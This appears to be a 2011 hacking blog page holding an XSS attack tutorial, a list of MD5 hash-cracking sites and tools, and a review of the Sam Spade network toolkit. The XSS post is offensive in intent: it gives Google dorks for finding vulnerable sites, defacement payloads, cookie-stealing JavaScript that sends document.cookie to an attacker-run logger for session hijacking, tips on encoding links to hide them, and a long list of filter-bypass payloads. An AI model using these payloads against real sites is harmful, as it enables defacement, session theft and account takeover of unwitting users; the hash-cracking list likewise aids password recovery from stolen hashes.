Saturday, December 3, 2011

CROSS SITE SCRIPTING (XSS) HACKING



What is XSS?
'XSS' also known as 'CSS' - Cross Site Scripting. It is a very common vulnerability found in Web Applications, 'XSS' allows the attacker to INSERT malicious code, There are many types of XSS attacks, I will mention 3 of the most used. This kind of vulnerability allows an "attacker" to inject some code into the applications affected in order to bypass access to the website or to apply “phishing" on falls users.


Types of XSS 
There are actually three types of Cross-Site Scripting, commonly named as:
1.DOM-Based XSS
2.Non-persistent XSS
3.Persistent XSS

DOM-Based
The DOM-Based Cross-Site Scripting allow to an attacker to work not on a victim website but on a victim local machine: the various operative system usually includes "since born" some HTML pages created for different aims, but as long as the humans do mistakes this HTML pages often can be exploited due to code vulnerabilities.
v  The DOM-Based XSS exploits these problems on user’s local machines in this way:
v  The attacker creates a well built malicious website
v  The ingenuous user opens that site
v  The user has a vulnerable page on his machine
v  The attacker's website sends commands to the vulnerable HTML page
v  The vulnerable local page executes that commands with the user's privileges on that machine.
v  The attacker easily gain control on the victim computer.

Non-Persistent
The non-persistent XSS are actually the most commons vulnerabilities that can be found on the Net. It's commonly named as "non-persistent" because it works on an immediate HTTP response from the victim website: it show up when the webpage get the data provided by the attacker's client to automatically generate a result page for the attackers himself. Standing on this the attacker could provide some malicious code and try to make the server execute it in order to obtain some result.

The most common applying of this kind of vulnerability is in Search engines in website: the attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will return the result of these HTML entities.

Persistent
The persistent XSS vulnerabilities are similar to the second type (Non-persistent XSS), because both works on a victim site and tries to hack users information and the difference is that in websites vulnerable to Persistent XSS the attacker doesn't need to provide the crafted URL to the users, because the website itself permits to users to insert fixed data into the system: this is the case for example of "guestbook". Usually the users uses that kind of tool to leave messages to the owner of the website and at a first look it doesn't seems something dangerous, but if an attacker discover that the system is vulnerable can insert some malicious code in his message and let ALL visitors to be victim of that.

This works when the tool provided (the guestbook in the example) doesn't do any check on the content of the inserted message: it just inserts the data provided from the user into the result page.

How to Find XSS VULNERABILITY?

Well to start finding these vulnerabilities you can start checking out Blogs, Forums, Shout boxes, Comment Boxes, Search Box's, there are too many to mention.

Using 'Google Dorks' to make the finding easier, Ok if you want to get cracking, go to google.com and type inurl:"search.php?q=" now that is a common page and has a lot of results. Also note that most sites have XSS vulnerabilities, it’s just having a good eye, and some good knowledge on how to bypass there filtration.

Basics of XSS
Well now let’s start learning some Actual Methods, the most common used XSS injection is:

<script>alert("The Hacker News")</script>

Now this will alert a popup message, saying "The Hacker News" without quotes. So, use "search.php?q=" and you can simple try the following on a website with the same thing,

http://website.com/search.php?q=<script>alert("The Hacker News")</script>

there are good chances of it working, but don’t be worried if it don’t, just try different sites. You can insert HTML not just JavaScript:

http://website.com/search.php?q=<br><br><b><u>The Hacker News</u></b>

if you see the bold text on the page and newlines then you knows its vulnerable.


How to Deface a Website using XSS?
Well now you understand how XSS works, we can explain some simple XSS deface methods, there are many ways for defacing I will mention some of the best and most used, the first one being IMG SCR, now for those of you who don’t know html, IMG SCR is a tag, that displays the IMAGE linked to it on the webpage.

<html><body><IMG SRC="http://website.com/yourDefaceIMAGE.png"></body></html>

ok now if you change the link to a valid picture link, and save it and run it you will see what i mean. Right now say you have found a Shout box, Comment box, or anything that shows your data after you submitted it you could insert the following to make the picture display on the page.

<IMG SRC="http://site.com/yourDefaceIMAGE.png">

The other tags are not needed has the page will already have them. Ok it helps to make your picture big so it stands out and its clear the site got hacked. Another method is using FLASH videos, it’s the same has the method below but a more stylish deface.

<EMBED SRC="http://site.com/xss.swf" 

That will execute the flash video linked to it. Or maybe using a pop or redirection as:
<script>window.open( "http://www.thehackernews.com/" )</script>

There are many others ways that you can found using Google or other website. Mine purpose is to make you understand the concept :)

How to Cookie Stealing using XSS?
I decided to add this has it’s the most useful method of XSS. Now you have it save it has a .php file and upload to your server, remember to create the file 'log.txt' too and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do. Now you want to insert this code.

window.location =
"http://yourServer.com/cookielogger.php?c="+document.cookie

or

document.location =
"http://yourServer.com/cookielogger.php?c="+document.cookie

Now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen the second one is more stealth. Watch your file now for cookies, then you can hijack there session :D


but now you ask what if my site has not got, this kind of attack, it only shows data once and don’t store it. Well let’s say we had a page search.php?q= we can use the following code to make a malicious URL from it and maybe hex, base64 encode it so people can’t see the code

http://site.com/search.php?q=document.location =
"http://yourServer.com/cookielogger.php?c="+document.cookie

How to Bypass Filtration?
Lot of sites may seem vulnerable but not executing the code, well to solve this read this. Some common methods to bypass filtration is

')alert('xss');

or

");alert('xss');
that will do the same thing has <script>alert("XSS")</script> on a vulnerable server. You can also try hexing or base64 encoding your data before you submit, Please note its bad practice to use alert("XSS") to test for XSS, because some sites block the keyword "XSS" before so we using "The Hacker News".

Some other ways to bypass filtration
website.com/search.php?q="><script>alert('The Hacker News')</script>
website.com/search.php?q="><script>alert("The Hacker News")</script>
website.com/search.php?q="><script>alert("The Hacker News");</script>
website.com/search.php?q="><script>alert(/The Hacker News");</script>
website.com/search.php?q=//"><script>alert(/The Hacker News/);</script>
website.com/search.php?q=abc<script>alert(/The Hacker News/);</script>
website.com/search.php?q=abc"><script>alert(/The Hacker News/);</script>
website.com/search.php?q=abc"></script><script>alert(/The Hacker News/);</script>
website.com/search.php?q=abc//abc"></script>alert(/The Hacker News/);</script>
website.com/search.php?q=000"><script></script><script>alert(The HackerNews);</script>
website.com/search.php?q=000abc</script><script>alert(/The Hacker News/);</script>
website.com/search.php?q=--<script>"></script>alert(/The Hacker News/);</script>
website.com/search.php?q=pwned<script>document.write('The Hacker News');</script>
website.com/search.php?q=pwned</script><script>document.write(The Hacker
News);</script>
website.com/search.php?q=pwned')alert(The Hacker News);//
website.com/search.php?q=pwned";)alert(The Hacker News);//
website.com/search.php?q=pwned");alert(/The Hacker News/);//
website.com/search.php?q=pwned//"></script><script>location.href='javascript:alert(/Th
e Hacker News/);</script>
website.com/search.php?q="><img src='javascript:alert('The Hacker News');'>
website.com/search.php?q="><script src='http://malicous js'</script>

Advanced XSS - way to bypass magic quotes filtration
Ok now we are going to learn about some good techniques. I have come across many sites where 'Magic Quotes' is on and therefore rendering some commands useless. Fear not, i have come up with a way using char codes (Decimals), to convert char code to Ascii. The functions to turn CharCodes (Decimals) into ASCII, you can find a complete table HERE

This will help you write what you want, In my examples will be writing "tpz" this is the following code
116 112 122

Ok now we got the Decimal value of our string, we need to know what function in JavaScript converts this.

String.fromCharCode()

is suitable for this kind of things, it’s easy to setup, I’m going to give it my argument below.

String.fromCharCode(116, 112, 122)

Ok now "String.fromCharCode(116, 112, 122)" Is a JAVA (ASCII) way of saying "tpz". And to use this with alerts etc, you dont need to use quotes, as it acts as a variable.

<script>alert(String.fromCharCode(116, 112, 122))</script>

Ok now this will display or message in this case "tpz", this method is very useful for bypassing magic quotes and maybe some custom escaping of quotes. There are many others methods that I’m not going to talk about right now.
Posted by hackers at 8:37 AM 1 comments

Friday, November 25, 2011

DECRYPT MD5 HASHES


MD5 hashing is said to be a one-way hash method where it is not possible to decrypt the Hashed string to get the original Word. But, once the string to be hashed using MD5 is indexed in Google and its hash too is indexed in Google, it is possible to reveal the original Password through it. But, doing a normal Google search won’t really make it easy for you to find the Original Strings. So, I am going to tell you about some special Search engines most of them are derived from Google which help in decrypting your MD5 hashes and revealing the originally locked Passwords or Keywords.


Online decrypting
MD5Crack
This will help you generate as well as Decrypt the MD5 hashed strings. It has a Google like interface.

MD5Decoder
This also helps in decoding the HEX coded strings which are of 32 characters.

MD5Cracker
Helps to decode as well as encode an MD5 hash.

ReverseMD5 hash
Has a Google-like look and is powered by rednoize.com. Using SHA1 is also possible with this tool.

MD5Decrypter
This helps to decrypt a maximum of 8 hashes at the same time. CAPTCHA is used to avoid use by spammers.

ReverseMD5 lookup
Decrypts Hash to clear text as well as Encrypts any String into MD5 hash.

MD5hash Database
This search about five databases for the Hash, if the Clear text is found in any of those then the appropriate result is shown.

XMD5
A Chinese Search engine to decrypt MD5 hashes online.


Local software

You like to try cracking the hash on your local machine? Of course there are applications that will handle this as well, such as the top dogs “John the Ripper” and “Cain & Abel”:

RainbowCrack
Rainbow table implementation that supports multiple codes like LM, NTLM and MD5

Cain & Abel
In my opinion the most advanced password cracker for Windows available to the public

MD5 GPU Crack
Local software (Windows) using GPU hardware

John the Ripper
Using John the Ripper (Unix/Windows) to crack MD5 hashes locally
Posted by hackers at 2:29 AM 1 comments

Sunday, November 20, 2011

SAM SPADE: A MULTIFUNCTION INFORMATION TOOLKIT


Systems and security administrators have a number of useful tools at their disposal to obtain information about computers attached to other networks on the Internet, as well as information about the Internet itself. Ping, traceroute, whois and nslookup are among the essential utilities for even rudimentary maintenance and testing. But the native Windows environment includes only a few of these tools and they are, by and large, individual command line utilities and one has to go to third parties to obtain many of the missing utilities. Sam Spade is a nice piece of software that combines many of these common tools and several more uncommon ones into a single, integrated, Windows-compatible package.

Jack of All Trades

Sam Spade runs on all versions of Windows starting with Windows 95 and makes it simple to do a lot of investigation and analysis quickly, from determining the owner of a particular IP address block to examining the contents of a Web page. It also has several features that are specific to the detection of spam and sites that relay spam. Like a real private detective, Sam Spade doesn't do anything that you couldn't do yourself if you knew how and had the right tools; this software integrates the capabilities found in ping, traceroute, time, whois, nslookup, finger, DIG, a packet sniffer, a port scanner, a scripting language, and more, all with a nice GUI to boot.
 FIGURE 1. The Sam Spade command console.

Figure 1 shows the Sam Spade command console. The various tools can be accessed via the pulldown menus, and several from the icons on the left side of the window.
 FIGURE 2. Sam Spade configuration dialog box.

Although most of Sam Spade's features will run immediately upon installation, the more interesting and useful features require some minimal configuration. The configuration dialog box (Figure 2) is accessible from the Edit, Options pulldown menu. Key features to configure are your default name server, e-mail address, and Web site on the Basics tab; the network news server on the News tab; and e-mail information for abuse e-mails on the Mail tab. Users can also configure a time server (Miscellaneous tab), log file locations (Logfiles tab), and scripting file locations (Scripting tab). Advanced users can also specify whether DNS zone transfers, port scanning, and/or e-mail relay checking is allowed (Advanced tab).

Although most of Sam Spade's features will run immediately upon installation, some functions require configuration, including your default name server, e-mail address, Web site, network news server, time server, and log file locations. Users can also specify whether DNS zone transfers, port scanning, and/or e-mail relay checking are allowed;. these may be useful features for a knowledgeable user but can be mistaken as an attack by a remote system, so their use should be limited.

All of the functions become available when the user enters a host name, domain name, or e-mail address in the address window, seen at the upper left of the main console screen. One of the advantages of this bundle of tools in one package is that once you enter a name or address, you can merely click on different tools to quickly obtain information.

Tools for Address, Domain, and Host Information

The bulk of Sam Spade's utilities allow the user to look up information about a remote host or domain, generally for the purpose of initial reconnaissance or forensic analysis:

  • Ping sends a series of packets to the indicated host to determine if that system is reachable via the network and provides an estimate of the round trip packet time.
  • Traceroute traces the route that packets take from the user's system to the specified target host address, listing all intermediate routers and showing a graph of the hop-by-hop delay times. Fast and slow traceroute differ only in the number of attempts made to learn the route.
  • Nslookup and Decode URL display the IP address and name of a specified host. This can help an investigator learn about the owner of a system from the domain name or obtain an IP address with which to further investigate the geographic location of a system.
  • Whois provides ownership and contact information for the specified host's domain. This tool is increasingly convenient as the number of domain name registrars grows. When Network Solutions was the sole registrar for .com, for example, their whois database was the only one you needed to search. With about 100 accredited registrars today, you have to do a search just to find out which registrar to lookup. Sam Spade's whois function does this for you.
  • IP Block indicates the owner of the IP address block to which the specified host belongs. By identifying the owner of an address block, you can start to narrow down where a host is geographically located and/or learn about the host's upstream Internet service provider (ISP).
  • DIG (Domain Internet Groper), like nslookup, looks up DNS information. Sam Spade's DIG function returns all DNS records associated with a specified host or domain, including the start of authority (SOA), mail exchange (MX) and name server (NS) records. This information allows the user to determine where to send e-mail to a host's domain and how to access the manager of the domain's name space.
  • Zone Transfer is used to request that a DNS server send all of the information that it has about a given domain. Properly configured DNS servers will not comply with this request as a security precaution, but it will work surprisingly often. This is a great way to test your own name servers.
  • Finger obtains host/user information from a system running the finger daemon (TCP port 79). Finger is generally (or should be) disabled at a host because it can give an attacker a lot of information about users and/or the host itself, but it isn't always turned off.

Tools for E-mail and Spam

Several of the Sam Spade utilities are targeted at e-mail, allowing an end user or security administrator to determine the validity of e-mail header information as well as to fight back against spam. The program also provides an extensive tutorial on tracking and combating spam. These tools include:

  • SMTP Verify can be used to send a Simple Mail Transfer Protocol (SMTP) VRFY command to a suspect mail server to confirm the validity of an e-mail address, such as that of the sender of a spam message (ever notice that most of the return addresses are bogus?). This function is generally (or should be) disabled at an SMTP server because it can give an attacker a lot of information about e-mail users. However, it isn't always turned off and it is worth checking out.
  • Blacklist checks to see if the specified host name/address is listed with the Mail Abuse Prevention System (MAPS) Realtime Blackhole List (RBL), Dial-up Users List (DUL) or Relay Spam Stopper (RSS). More information about this function can be found at the MAPS Web site at www.mail-abuse.org.
  • SMTP Relay Check determines if a specified e-mail server will allow SMTP relaying. Most e-mail servers are configured to prohibit relaying, but spammers look for SMTP servers that relay to help them cover their tracks. Many sites block all incoming e-mail originating from an e-mail server known to relay e-mail because of the spam potential.
 FIGURE 3. E-mail header parsing and verification.

  • Parse e-mail headers allows the user to verify a set of headers from an e-mail message. As shown in Figure 3, the mail headers can be copied directly from an e-mail message and pasted into the parse e-mail headers dialog box, where. Sam Spade will then indicate whether the mail headers appear to be valid or not. Spammers or others looking to cover their e-mail tracks will often put in false e-mail header information.
  • Abuse Lookup finds the e-mail address to where notifications of possible spam coming from the specified domain should be sent. Most ISPs maintain an address of the form abuse@<ISP.net>.
  • Check Cancels searches for USENET canceled messages. The original intent of cancel was to allow someone who sent a USENET message to cancel the message it if they wanted to, and it is now used largely to automatically cancel spam.

Tools to Examine a Server or Web Site

Several Sam Spade tools allow a user to more closely examine the services available from another host, with particular attention to obtaining information about Web servers:

  • Scan Addresses is a minimal port-scanning utility that allows a user to scan a specified set of IP address to detect open ports (which indicates what Internet services are available).
 FIGURE 4. Web page display from Sam Spade.

  • Browse Web is actually a bare-bones Web browser. Rather than displaying the rendered Hypertext Markup Language (HTML) page, however, this function displays the raw Hypertext Transfer Protocol (HTTP) code (Figure 4), providing such details about the Web server as the operating system, Web server software, and HTTP extensions. It is also very useful for debugging CGI scripts or when looking at potentially malicious Web sites.
  • Crawl Web site allows you to specify a URL and download all accessible pages from a Web site.

 
Posted by hackers at 11:46 PM 0 comments
Subscribe to: Posts (Atom)